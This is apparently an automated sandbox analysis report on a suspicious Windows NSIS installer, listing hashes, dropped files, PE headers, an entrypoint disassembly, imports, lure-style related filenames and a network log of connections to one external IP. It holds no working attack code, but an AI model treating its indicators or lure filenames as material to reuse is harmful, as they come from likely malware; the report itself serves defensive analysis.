MD5: 9625D5B1754BC4FF29281D415D27A0FD
SHA1: 80E85AFC5CCCD4C0A3775EDBB90595A1A59F5CE0
SHA-256: C2F405D7402F815D0C3FADD9A50F0BBBB1BAB9AA38FE347823478A2587299448
SHA-512: DCE52B640897C2E8DBFD0A1472D5377FA91FB9CF1AEFF62604D014BCCBE5B56AF1378F173132ABEB0EDD18C225B9F8F5E3D3E72434AED946661E036C779F165B
Malicious: false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: Potwierdzenie.exe, Detection: malicious, Browse
                                                • Filename: Potwierdzenie.exe, Detection: malicious, Browse
                                                • Filename: RICHIESTA_OFFERTA_RDO2400423.docx.doc, Detection: malicious, Browse
                                                • Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Detection: malicious, Browse
                                                • Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Detection: malicious, Browse
                                                • Filename: Nutzen_Unterschrift_Planen#2024.com.exe, Detection: malicious, Browse
                                                • Filename: Nutzen_Unterschrift_Planen#2024.com.exe, Detection: malicious, Browse
                                                • Filename: Benefit_Signature_Plan#3762.com.exe, Detection: malicious, Browse
                                                • Filename: Benefit_Signature_Plan#3762.com.exe, Detection: malicious, Browse
Reputation: moderate, very likely benign file
Process: C:\Users\user\Desktop\3507071243740008011.exe
File Type: data
Category: dropped
Size (bytes): 275040
Entropy (8bit): 7.825277312996347
Encrypted: false
SSDEEP: 6144:P5XT4JjPPEAaRnOn2Ve4a0GClPcj4/egfL:EzEAaRnd1aAPrz
MD5: E8245DB6B6E54F7C0D63D57E8EFAF894
SHA1: 1F00810AEF27A4018360E9104B1E58F75E713E28
SHA-256: 70758486A5D02D9F560081520A6484D24AC0100BA38A66980CA6D618CE3DF224
SHA-512: B79DB2F35357148C58481E0F2EC11802E0EA52BB37B73DE4E062763457671600D17DF228EE5FA0F41EBF52130954DD02D9BDA873DD20BD3777A2B2B3E2344A0F
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\3507071243740008011.exe
File Type: data
Category: dropped
Size (bytes): 46153
Entropy (8bit): 4.551881715223996
Encrypted: false
SSDEEP: 768:KzRgvbCj7eXDwAX+Fg2mUrZunWT1xdtoQkaor4p2JEoAAJBIVjDdJ:Kq22EA4VZ8C1xdt7k34pGCAXILJ
MD5: 87AC38D040E1207012CF6AD9A83C6530
SHA1: 59E5A1243DCB479A5F3361E38F62D3DE6BBF4C55
SHA-256: A5FE6A3AC0371EE8D3D089C3A69A68B25EBBB5F7362C469DF3EACBD2F627CB60
SHA-512: 98794621B3DDA069E1F9567922CCB9CDA7D3BBCBA3254AE179FCE24E7B4615E8AF4BE0A2D25858F1F0B495296D05BB6702819DADA90A963B3F89C5AC50FA0271
Malicious: false
Reputation: low
                                                Process:C:\Users\user\Desktop\3507071243740008011.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 999x605, components 3
                                                Category:dropped
                                                Size (bytes):167813
                                                Entropy (8bit):7.749904770387752
                                                Encrypted:false
                                                SSDEEP:3072:icF5a5FZl5xa0SYazQR5dRfp3oVadIALnwP5kipQlMXG6g9:5r2x1SYkQR53fpoVABLnwRk0QKXRg9
                                                MD5:8C0739994C90303B65A05C6909A53B62
                                                SHA1:E43239AF385F8DED6EA2098D2A71A2AC9519E32B
                                                SHA-256:7E1835782673A877C8A4FF9A4E9E88A23D8FA54077B6E7E1D70FBDE5F3A9D66B
                                                SHA-512:65BB94BEE91A5581EC7BEFE758F2AD71235ED07DEDDC5B85F5E5719B62E2ADCEFDFB080C9DC5D5C67BC2DBA846C26B62E8E043DCF33F02F65B9B18FC4942277F
                                                Malicious:false
                                                Reputation:low
                                                Preview:......JFIF.....H.H....9Rhttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46.272976, Sat Jan 27 2007 22:37:37 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Make>Canon</tiff:Make>. <tiff:Model>Canon DIGITAL IXUS 800 IS</tiff:Model>. <tiff:Orientation>1</tiff:Orientation>. <tiff:XResolution>72/1</tiff:XResolution>. <tiff:YResolution>72/1</tiff:YResolution>. <tiff:ResolutionUnit>2</tiff:ResolutionUnit>. <tiff:YCbCrPositioning>1</tiff:YCbCrPositioning>. <tiff:Compression>6</tiff:Compression>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:xap="http://ns.adobe.com/xap/1.0/">. <xap:ModifyDate>2008-12-25T21:16:15Z</xap:ModifyDate>. <xap:CreatorTool>Adobe
                                                Process:C:\Users\user\Desktop\3507071243740008011.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):329924
                                                Entropy (8bit):4.933260234424776
                                                Encrypted:false
                                                SSDEEP:6144:sXxDu/qV1rYX0GEETHfS1YHoQccZ6eJ7Myv5CTV:shy/qSu6qJcZFJPBi
                                                MD5:562A26D4A57C23D2AE8BD4DECE37E771
                                                SHA1:A9830E759E670EB8D4EFC5320A112E44ECB389BA
                                                SHA-256:EDF2898EFF5E72AA11993272EB941C1CD992BB6243E4D2F5940BD88EDF9117CD
                                                SHA-512:50E8291CB30F1916A5FC41EC7A64C9690A5ABD2AA5B56277029AB04EBCA19769DA91C214C4098B7FC5A8E7E048EBACFC9CFD41540F613B65C1BFF92AEAC49496
                                                Malicious:false
                                                Preview:......s.......|Xkt........"..y....8W..........6.......g...k.X......G,..........Q...+...M......2....Vr......3....n...q^D.......J.-........l.........&....~.......E,..(d...e.....S......a........J...#............w..).......y.?....b.........\.............u...............y.6....].j..........y......4.......T...x......O7....E.....)...|.J.9..)...5c...^..'.......YA............#t...e.....}.....B......"............K..0...{......Z..,........\....X...D.y........j(...........l......*......0.........j.E6.......................t...................Bm-............N...`..................A..../{...(...hN...............k...X...Y.m...P......^....O?..........C.e........B..b............y..M...P...... y............|....}.8..H..........y................r.oS!.'..G...l.7.*.....q..tO..g.....,..........~.................?..............V.B.........B......n/..j...............e...........0.mo.b......Ix.....=..Q.!..G............Q\4n..........O.br.7....d.nvH.t.....`...b......A.+...1............j....w......T.
                                                Process:C:\Users\user\Desktop\3507071243740008011.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):48084
                                                Entropy (8bit):4.914629993393861
                                                Encrypted:false
                                                SSDEEP:768:D/rnROkWNBnJ+9RlvYC45nQikaSOn/i7/nY1kakXzsDwft2EwNWBbTvMIQwBT:zrx8BnJ+lyzknku2kakXYDwcEcWbwoBT
                                                MD5:511E6E568EBCF13D5098054630C627AA
                                                SHA1:1B5AFC7023C138219737E23B00121C359BF8443F
                                                SHA-256:204A44F0D3C3B63E36B3A4865C029552CCD8AC1EAD3507456BEC7886D724BA54
                                                SHA-512:DC3088BA850BA2258715826CF985D417A6A138A9EF66F43EBC69EB18CEDA9F4B65686C3F70E2BA39E64AEB8B55B82F550EE603094F06B988DC122299183075E8
                                                Malicious:false
                                                Preview:.................3v......0...........8......n..m....i............d ...... ..........'..MDY...... ...|............-.....|....dt...........G...bC..J............~....?..@........?.k..................z..!........k........................i.......|f.....X.(.......N..X..v....>..e..................J.....T..........3."...p9...r....2........................<..".......qj...i.`.;........a..........v...k.......%.f......os.....,....(.*.....|...#...y.7....,...............c.......i.9H............L..sx...{....=.....N'..\...|.B.....U...&.........B1J<................A....1.....A}\.7.Q........7................K..............C%......8...G....a.................................T.Y.kB.........P............o...&.`....{...{..A.........f....`.........q..............d.............W.......1-...>..R.)s;".e......0..B...].....E........R..............`.......{'...........0...m........._t.........x..............#.p....@_3..j.o............................C......=`...........Nx....Q\......:....A....5...e......~..
                                                Process:C:\Users\user\Desktop\3507071243740008011.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):501
                                                Entropy (8bit):4.284126845947256
                                                Encrypted:false
                                                SSDEEP:12:7Dvz9cWhFxJiWtT/ksqSYLbLGLW+/tbV90QhtdtmCq/oK6:vpJrilbgW+hHfmCq/ol
                                                MD5:5D2F45598C5DAD8A461CECDA82CA550E
                                                SHA1:D594FFDAE11463E5E35170D27C611182F16E038C
                                                SHA-256:65D3114548018688712A3B735E3B9BA63C2261A5DA9B6505D43378DE5E351B87
                                                SHA-512:BF9654722B7F313B0E5C9A755C0DA9D37930FA517CA43F36C97F6033C7C764ACACDAC8FDE143A9D89D33D9ED7CC4EE08A96A0DEB14D484E4ACB43E830CA15470
                                                Malicious:false
                                                Preview:wellcurbs realkreditlaan rhamnoses aluminiumfoliens needlecase gld.bromelin scoters mormoder klinges albigensianism sociolektens curpel shuttles awreck laboratorieopgave eksercerskoler..nonfederated sprinklingers multiplepoinding indfaldsvinkelen korttegnere opinionsmaalingernes exobiology.amazingly palikars accessibility matriarchical erstatningskravene dorns..reclaimant prepubescent unfairest lusiad uhmmedes proctodaeum sydslesvigers.stormwise septaemia rangsforskel flytteligt hardboard dentex,
                                                Process:C:\Users\user\Desktop\3507071243740008011.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):54488
                                                Entropy (8bit):4.944297757860882
                                                Encrypted:false
                                                SSDEEP:1536:BYkiahV7T7eAwz8ruqJUjhEXVM54+suwGXs:BFiahJTCAi8dQ6M54rWs
                                                MD5:4ECFFF116FE03C56DAD5B0EAE0279D00
                                                SHA1:18525703697F059B03F7A1F093317E62BAD43004
                                                SHA-256:593BF06B816C8CACBA83C6CCECD0C3F0F164C4D9CC7F9B4EA7BF2EA2F0CD7906
                                                SHA-512:D6EBCD15BEE3AD32BB91D7EFEAB363B917127ACF62A8838E621FFA0F080060E00E06BDACD9F2BDD4BE37DFC1A9449A4CE678BC1821E005BAEC3263272BF8877A
                                                Malicious:false
                                                Preview:.... ........a....D..o.X...........&.=...x.....l...w......h.2....D ..............6...V^.~...u.......v...(.......8Q..7.................6....A6.....;..5.T.P......K...I...]...........Bk.....4......4.....'...z....k./.....r......f..8.5....S......T..0......."...x...S........@......(......z.;...H...3'd.d.....{.c..Z...3........|...........].i...2....8.{....0............8.............6...<.@C..r..$3...N=...+..].s...6.........N........y........I..........W....&.........T....}............bd.g................,.......I#..J/...C-.....e...}!..........J..B.P...............{..................8i....$................1.1......[.............>....`4y....A.kA......U........[...dmE..5.......)...e...).....l....T.l......................................`.[....l.N..=...........$....g.... ....Z.<v...?....>...L.o..........D.......&'.*.........2..............k......... 2E... ....KT..2.,.......`.c...........d.E.......<p......!0...I.U....9.._.....a..o5>...............+.....]...P...D....C@..N.........w.hx..
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.74598799640421
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:3507071243740008011.exe
                                                File size:986'863 bytes
                                                MD5:300ffb3fd65eb4a84a14802828f91e38
                                                SHA1:937574595a8e68f7a77b95a7f99b530007f9fc5c
                                                SHA256:24beefbe74ccf89b245d50c7279c83803186566d4be4f89f875e203ec2f4edf9
                                                SHA512:c79642cc8d878f5028dff42341dc137c59127cc7a395a39891457648460d8c421ea37c5ac7569d58f5be92a1a7f10d5aed83cadbfcb8e4ee14428c852aac8348
                                                SSDEEP:24576:8HANkRMLHpYc/hipJgn1pRQFPEgAhHjL4kJiMv:8HANkRMLHicJi3o10RHc0aJ
                                                TLSH:4D252208E7E07467C3E58FF8072652577637AC69E5920B870391BFAA3A65740F60E378
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...~..Y.................f.........
                                                Icon Hash:c4bcaaec6ceeda31
                                                Entrypoint:0x403373
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x597FCC7E [Tue Aug 1 00:34:06 2017 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                Instruction
                                                sub esp, 000002D4h
                                                push ebx
                                                push esi
                                                push edi
                                                push 00000020h
                                                pop edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+14h], ebx
                                                mov dword ptr [esp+10h], 0040A2E0h
                                                mov dword ptr [esp+1Ch], ebx
                                                call dword ptr [004080A8h]
                                                call dword ptr [004080A4h]
                                                and eax, BFFFFFFFh
                                                cmp ax, 00000006h
                                                mov dword ptr [00434EECh], eax
                                                je 00007F2C6CC74513h
                                                push ebx
                                                call 00007F2C6CC777A9h
                                                cmp eax, ebx
                                                je 00007F2C6CC74509h
                                                push 00000C00h
                                                call eax
                                                mov esi, 004082B0h
                                                push esi
                                                call 00007F2C6CC77723h
                                                push esi
                                                call dword ptr [00408150h]
                                                lea esi, dword ptr [esi+eax+01h]
                                                cmp byte ptr [esi], 00000000h
                                                jne 00007F2C6CC744ECh
                                                push 0000000Ah
                                                call 00007F2C6CC7777Ch
                                                push 00000008h
                                                call 00007F2C6CC77775h
                                                push 00000006h
                                                mov dword ptr [00434EE4h], eax
                                                call 00007F2C6CC77769h
                                                cmp eax, ebx
                                                je 00007F2C6CC74511h
                                                push 0000001Eh
                                                call eax
                                                test eax, eax
                                                je 00007F2C6CC74509h
                                                or byte ptr [00434EEFh], 00000040h
                                                push ebp
                                                call dword ptr [00408044h]
                                                push ebx
                                                call dword ptr [004082A0h]
                                                mov dword ptr [00434FB8h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+34h]
                                                push 000002B4h
                                                push eax
                                                push ebx
                                                push 0042B208h
                                                call dword ptr [00408188h]
                                                push 0040A2C8h
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6a000 | 0x34908 | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                .text | 0x1000 | 0x65ef | 0x6600 | a7ac317f30d043d93d4c5978f973de39 | False | 0.6750919117647058 | data | 6.514810500836391 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata | 0x8000 | 0x149a | 0x1600 | 966a3835fd2d9407261ae78460c26dcc | False | 0.43803267045454547 | data | 5.007075185851696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data | 0xa000 | 0x2aff8 | 0x600 | d113e76cc1b8c0774c4702688d79d792 | False | 0.5162760416666666 | data | 4.036693470004838 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata | 0x35000 | 0x35000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc | 0x6a000 | 0x34908 | 0x34a00 | d09097303c9883a16609d6cfc168ddcd | False | 0.5725671763657957 | data | 6.134346545573802 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                RT_BITMAP | 0x6a400 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
                                                RT_ICON | 0x6a768 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.39200579675854724
                                                RT_ICON | 0x7af90 | 0xc890 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9980328762854472
                                                RT_ICON | 0x87820 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.46636535631700654
                                                RT_ICON | 0x90cc8 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.49302218114602586
                                                RT_ICON | 0x96150 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.4863013698630137
                                                RT_ICON | 0x9a378 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.46473029045643155
                                                RT_ICON | 0x9c920 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.550187617260788
                                                RT_ICON | 0x9d9c8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.4095744680851064
                                                RT_DIALOG | 0x9de30 | 0x144 | data | English | United States | 0.5216049382716049
                                                RT_DIALOG | 0x9df78 | 0x13c | data | English | United States | 0.5506329113924051
                                                RT_DIALOG | 0x9e0b8 | 0x100 | data | English | United States | 0.5234375
                                                RT_DIALOG | 0x9e1b8 | 0x11c | data | English | United States | 0.6056338028169014
                                                RT_DIALOG | 0x9e2d8 | 0xc4 | data | English | United States | 0.5918367346938775
                                                RT_DIALOG | 0x9e3a0 | 0x60 | data | English | United States | 0.7291666666666666
                                                RT_GROUP_ICON | 0x9e400 | 0x76 | data | English | United States | 0.7542372881355932
                                                RT_VERSION | 0x9e478 | 0x14c | Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970 | English | United States | 0.5813253012048193
                                                RT_MANIFEST | 0x9e5c8 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384
                                                DLL | Import
                                                KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                Language of compilation system | Country where language is spoken | Map
                                                English | United States |
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Oct 20, 2024 17:58:24.680136919 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:24.680197001 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:24.680279970 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:24.693173885 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:24.693196058 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:25.816365957 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:25.816476107 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:25.889065981 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:25.889127016 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:25.889461994 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:25.893028021 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:25.898695946 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:25.943411112 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.231201887 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.231235981 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.231326103 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:26.231345892 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.233017921 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:26.389780998 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.389905930 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:26.402545929 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.402631998 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:26.402932882 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.403419018 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:26.500889063 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.500992060 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:26.540868044 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.540975094 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:26.568733931 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.568821907 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:26.571852922 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.571923971 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:26.574285030 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.574363947 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:26.576348066 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.576419115 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:26.597790956 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.597944975 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:26.658461094 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.658539057 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:26.827584028 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.827724934 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:26.907340050 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.907491922 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:26.909204960 CEST | 443 | 49929 | 193.107.36.30 | 192.168.2.4
                                                Oct 20, 2024 17:58:26.909399033 CEST | 49929 | 443 | 192.168.2.4 | 193.107.36.30
                                                Oct 20, 2024 17:58:26.911382914 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.911470890 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.913454056 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.913539886 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.915146112 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.915219069 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.916872978 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.916939020 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.918632030 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.918828011 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.920344114 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.920442104 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.921917915 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.921983004 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.923458099 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.923542023 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.924207926 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.924278021 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.926162958 CEST44349929193.107.36.30192.168.2.4
